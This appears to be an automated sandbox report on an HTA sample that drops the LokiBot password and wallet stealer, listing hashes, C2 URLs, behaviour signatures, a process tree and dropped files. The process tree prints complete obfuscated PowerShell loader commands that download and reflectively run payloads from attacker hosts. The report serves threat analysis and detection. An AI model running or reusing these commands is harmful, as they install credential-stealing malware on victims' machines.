Analysis

  • max time kernel
    0s
  • max time network
    104s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-10-2024 01:33

General

  • Target

    4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d.hta

  • Size

    130KB

  • MD5

    0b1aa8ae190d05df71f4052fae67df5b

  • SHA1

    f6fe29f3e7830b15e3b244ba83216c029dcb60fb

  • SHA256

    4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d

  • SHA512

    94008a8bf00a1334c16129258243bf89d8351c82ede845fefdb657838fe2f602f761b9935e5fef5e01b368096993f49a48e65d3705cea948d9435db0df370a04

  • SSDEEP

    96:Eam7QSo4DH5wo4DH5rtTRJP4srvjTKP4DH5Sr4DH5NFAb5UAf4DH5G7T:Ea2Rok0RLknYoVT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

C2

http://94.156.177.220/logs/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • System Location Discovery: System Language Discovery
    PID:3476
    • C:\Windows\SysWOW64\WinDOWspOwershElL\v1.0\pOweRshEll.eXe
      "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      PID:2784
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        3⤵
        • Evasion via Device Credential Deployment
        PID:1852
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tia355fz\tia355fz.cmdline"
        3⤵
          PID:3688
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FF9.tmp" "c:\Users\Admin\AppData\Local\Temp\tia355fz\CSC80EAA966C3B5499AA8A5D33E93234E78.TMP"
            4⤵
              PID:4600
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
            3⤵
              PID:2004
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                4⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3364
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:2192
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    6⤵
                      PID:3936

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRshEll.eXe.log

            Filesize

            2KB

            MD5

            968cb9309758126772781b83adb8a28f

            SHA1

            8da30e71accf186b2ba11da1797cf67f8f78b47c

            SHA256

            92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

            SHA512

            4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            12KB

            MD5

            b6132f702d1dd1f0f270f49336cc6cff

            SHA1

            29cafff4e7109a877faa5c09b084fdd3dc4b0b9f

            SHA256

            8cd0875c1c85d4e16355caae76596168026cf5e7b5c31bdeea4138ac3dab89b7

            SHA512

            3afb2e33b61c3c3c13d5764162d7c0928ec8e670571b653449a614f529ccda299fc029246a3268fc89ea128292347c6f5301309460f1be9c79463a00e775d6ba

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            41b13d18ebd676296bf80d0f6b2ebdb0

            SHA1

            614401559d2d1a89b771961c651e1b464112a3a0

            SHA256

            04f43df7ba7a515826697848bcf453b0d0640505d3e221c245a35de64d8e6815

            SHA512

            c4f02f0df4ed04f6b39ce1e74599a3159232cc76acc0f9c63a7c89ea47d271c945d5bc26c927e0adc693a9e2bef95fe84f3ac1685573a823203d72cfb2b2beaa

          • C:\Users\Admin\AppData\Local\Temp\RES9FF9.tmp

            Filesize

            1KB

            MD5

            a9aab9a89b3d60066dc031b43236b017

            SHA1

            f265f3fb6818a83b5e300842566fb2327f76f178

            SHA256

            617aa01fb0d391a7726a7ca8ea642a8abd7418aeaf8577f3412a39118a38488b

            SHA512

            259102a8abb723e9e030307b0b599775690707d51e2734bee5e63dab9a44d23a4205305f5e0ab3f7f7a9ce30360fc207abc6572eb3f685976964aeba379b219a

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cme4bmo0.2fu.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\tia355fz\tia355fz.dll

            Filesize

            3KB

            MD5

            d167467399ad5a8ef4d4298cf3603b10

            SHA1

            4d868f56ee486abc0ad4dc135bc3305f0a4848eb

            SHA256

            fe730302f649be938e6d651787a037908bf979f53c2f6b937afd7026aa066e1a

            SHA512

            9817bedcc682f3a5c3f227e4d39ec5da081ce8ce21153c0e26b2360ccee9181d6e38a751bb99b535ee46d2c2cf47e0ba3926b121d9d8ed0ee72da86b15b68308

          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2437139445-1151884604-3026847218-1000\0f5007522459c86e95ffcc62f32308f1_4304acb9-c3f6-452a-9860-eb4e85d38d4e

            Filesize

            46B

            MD5

            d898504a722bff1524134c6ab6a5eaa5

            SHA1

            e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

            SHA256

            878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

            SHA512

            26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2437139445-1151884604-3026847218-1000\0f5007522459c86e95ffcc62f32308f1_4304acb9-c3f6-452a-9860-eb4e85d38d4e

            Filesize

            46B

            MD5

            c07225d4e7d01d31042965f048728a0a

            SHA1

            69d70b340fd9f44c89adb9a2278df84faa9906b7

            SHA256

            8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

            SHA512

            23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

          • C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS

            Filesize

            136KB

            MD5

            52a69ab69d1c871566791a3c06982607

            SHA1

            367845c8b76d602680ee6069f3bde95e02c350d9

            SHA256

            4f6090a3d6a848ae3ef2310caca02976fe8448fc21cbe357f4a28a88f34ead28

            SHA512

            681b60151ef27726f8b4c9c0949a8962fa8b16fe3583ba5ee4019831b6ac2ad5bf2562da0e8fc55cdec4cb10c59a608896b9be98bedd1a8bbde43b711ee2e0c2

          • \??\c:\Users\Admin\AppData\Local\Temp\tia355fz\CSC80EAA966C3B5499AA8A5D33E93234E78.TMP

            Filesize

            652B

            MD5

            601341f4ac1b28821f112abd44e879c5

            SHA1

            059a4cf02fc27901cf434a22ead0cb107a2d3dea

            SHA256

            ae5f635b3939d3023d6f8a6b68ae94211f6876dd3228cd6043a29111677291c6

            SHA512

            54be0bd92340371e6bab01a2321fb1f7854821b80815fef34f496e3e83d81504f903c7603385000f257845e3ae6a6226bec66f5e6acf08b2214d075492c04b43

          • \??\c:\Users\Admin\AppData\Local\Temp\tia355fz\tia355fz.0.cs

            Filesize

            469B

            MD5

            de4a3e7070e220b427d460a803bf2b1b

            SHA1

            f59c55466008ca3d557cc114c01395ba724a3a32

            SHA256

            0652da0455490eaf890ddcbc122a763d5f4031a9b2825d514d105bd8ea142eae

            SHA512

            afed9ff23e8f788d80f409856741bc68e985eb0092412f91e709d917fc37ea47e43b2560313195e5c0f8facc6232ddd74e5ca38c66d16af31d5f7b4984999b85

          • \??\c:\Users\Admin\AppData\Local\Temp\tia355fz\tia355fz.cmdline

            Filesize

            369B

            MD5

            4907b14d71398017a437c49720047645

            SHA1

            449b04bde94a6407a67eba38c6f6184498a5f339

            SHA256

            2ce07da0c22743061d56afa66350d4933b9d82571c1e13abfb54a73a7da63f88

            SHA512

            d76ec68b206cbcf86f491c99dcb0731d01b9c109c4155ff41cc8733e55c6083fd3d8b4e4556e12dfa204d393b849d7f0c02898f70e07603ce7acd6ea5514970a

          • memory/1852-29-0x0000000006DE0000-0x0000000006E12000-memory.dmp

            Filesize

            200KB

          • memory/1852-45-0x0000000007200000-0x0000000007296000-memory.dmp

            Filesize

            600KB

          • memory/1852-40-0x0000000006E20000-0x0000000006E3E000-memory.dmp

            Filesize

            120KB

          • memory/1852-30-0x000000006D760000-0x000000006D7AC000-memory.dmp

            Filesize

            304KB

          • memory/1852-43-0x0000000006F70000-0x0000000006F8A000-memory.dmp

            Filesize

            104KB

          • memory/1852-44-0x0000000006FE0000-0x0000000006FEA000-memory.dmp

            Filesize

            40KB

          • memory/1852-42-0x00000000075C0000-0x0000000007C3A000-memory.dmp

            Filesize

            6.5MB

          • memory/1852-41-0x0000000006E40000-0x0000000006EE3000-memory.dmp

            Filesize

            652KB

          • memory/1852-46-0x0000000007170000-0x0000000007181000-memory.dmp

            Filesize

            68KB

          • memory/1852-47-0x00000000071A0000-0x00000000071AE000-memory.dmp

            Filesize

            56KB

          • memory/1852-48-0x00000000071B0000-0x00000000071C4000-memory.dmp

            Filesize

            80KB

          • memory/1852-50-0x00000000071F0000-0x00000000071F8000-memory.dmp

            Filesize

            32KB

          • memory/1852-49-0x00000000072C0000-0x00000000072DA000-memory.dmp

            Filesize

            104KB

          • memory/2192-101-0x0000000007ED0000-0x0000000007F6C000-memory.dmp

            Filesize

            624KB

          • memory/2192-100-0x0000000007D70000-0x0000000007ECA000-memory.dmp

            Filesize

            1.4MB

          • memory/2784-19-0x0000000006000000-0x000000000604C000-memory.dmp

            Filesize

            304KB

          • memory/2784-6-0x00000000052C0000-0x0000000005326000-memory.dmp

            Filesize

            408KB

          • memory/2784-0-0x0000000070EAE000-0x0000000070EAF000-memory.dmp

            Filesize

            4KB

          • memory/2784-18-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

            Filesize

            120KB

          • memory/2784-71-0x0000000007390000-0x00000000073B2000-memory.dmp

            Filesize

            136KB

          • memory/2784-72-0x0000000008400000-0x00000000089A4000-memory.dmp

            Filesize

            5.6MB

          • memory/2784-79-0x0000000070EA0000-0x0000000071650000-memory.dmp

            Filesize

            7.7MB

          • memory/2784-1-0x00000000026C0000-0x00000000026F6000-memory.dmp

            Filesize

            216KB

          • memory/2784-5-0x0000000005120000-0x0000000005142000-memory.dmp

            Filesize

            136KB

          • memory/2784-65-0x0000000006590000-0x0000000006598000-memory.dmp

            Filesize

            32KB

          • memory/2784-17-0x0000000005B60000-0x0000000005EB4000-memory.dmp

            Filesize

            3.3MB

          • memory/2784-7-0x0000000005330000-0x0000000005396000-memory.dmp

            Filesize

            408KB

          • memory/2784-4-0x0000000070EA0000-0x0000000071650000-memory.dmp

            Filesize

            7.7MB

          • memory/2784-2-0x0000000070EA0000-0x0000000071650000-memory.dmp

            Filesize

            7.7MB

          • memory/2784-3-0x0000000005420000-0x0000000005A48000-memory.dmp

            Filesize

            6.2MB

          • memory/3364-85-0x00000000061A0000-0x00000000064F4000-memory.dmp

            Filesize

            3.3MB

          • memory/3936-102-0x0000000000400000-0x00000000004A2000-memory.dmp

            Filesize

            648KB

          • memory/3936-103-0x0000000000400000-0x00000000004A2000-memory.dmp

            Filesize

            648KB

          • memory/3936-127-0x0000000000400000-0x00000000004A2000-memory.dmp

            Filesize

            648KB

          • memory/3936-135-0x0000000000400000-0x00000000004A2000-memory.dmp

            Filesize

            648KB